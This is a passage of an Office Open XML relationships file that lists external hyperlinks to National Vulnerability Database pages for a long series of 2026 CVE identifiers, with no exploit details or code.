Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78834" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79376" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79602" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80074" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80077" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82536" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83998" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86083" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86730" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12611" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33197" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62648" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62649" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62650" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86727" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86732" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86738" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34223" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61517" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75990" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75991" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76190" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77109" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77774" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79721" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86510" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86722" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75993" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85384" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75999" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86819" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19203" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76191" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76202" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77968" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47297" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69530" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69782" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72981" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73313" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77505" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83527" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86720" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86723" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28662" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55277" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69418" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId404" /><Relationship 